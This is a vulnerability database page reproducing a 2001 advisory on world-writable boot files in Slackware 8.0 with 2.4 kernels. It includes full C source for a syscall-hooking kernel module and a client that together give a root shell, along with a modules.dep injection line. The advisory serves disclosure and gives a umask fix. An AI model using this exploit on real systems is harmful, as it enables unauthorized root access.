Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

slackware.init.txt

🗓️ 18 Jul 2001 00:00:00Reported by JoshType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

Vulnerability in Slackware 8.0 allows world writable files in startup scripts. Fix with umask 022.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`I posted this to the linux kernel mailing last Friday, July 13th 2001:  
  
Submitted by : Josh ([email protected]), lockdown  
([email protected]) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0. 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels starting with 2.4.3 (i think) have, after  
load, left a umask of 0000. This forces any files created in the bootup  
scripts, without the command `umask 022` issued to be world writeable.  
In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same  
vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep  
world writeable. With this file world writeable, all an intruder need do is  
put something like the following in /lib/modules/`uname -r`/modules.dep  
assuming the system's startup scripts modprobe lp:  
  
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o  
  
/tmp/alarm.o:  
  
where the alarm.o module is:  
  
#include <linux/config.h>  
#include <linux/module.h>  
#include <linux/version.h>  
#include <linux/types.h>  
#include <asm/segment.h>  
#include <asm/unistd.h>  
#include <linux/dirent.h>  
#include <sys/syscall.h>  
#include <sys/sysmacros.h>  
  
#include <linux/sched.h>  
  
#include <linux/errno.h>  
#include <linux/fs.h>  
#include <linux/kernel.h>  
  
extern void* sys_call_table[];  
  
unsigned int (*old_alarm) (unsigned int seconds);  
unsigned int hacked_alarm (unsigned int seconds);  
  
unsigned int hacked_alarm(unsigned int seconds)  
{  
if(seconds == 454) {  
current->uid = 0;  
current->euid = 0;  
current->gid = 0;  
current->egid = 0;  
return 0;  
}  
return old_alarm(seconds);  
}  
  
int init_module(void) {  
old_alarm=sys_call_table[SYS_alarm];  
sys_call_table[SYS_alarm] = hacked_alarm;  
return 0;  
}  
  
void cleanup_module(void) {  
sys_call_table[SYS_alarm] = old_alarm;  
}  
  
make a client:  
#include <stdio.h>  
#include <unistd.h>  
  
int main(void)  
{  
alarm(454);  
execl("/bin/sh", "sh", NULL);  
}  
  
which will, when the module is loaded, execute a shell as root.  
  
  
And of course with /var/run/utmp writeable, users can delete or in  
other ways manipulate their logins as they appear in  
w/who/finger/getlogin(), etc.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Jul 2001 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilityslackware 8.0local accessworld writableumask 022kernel module exploitation
34
.json
Report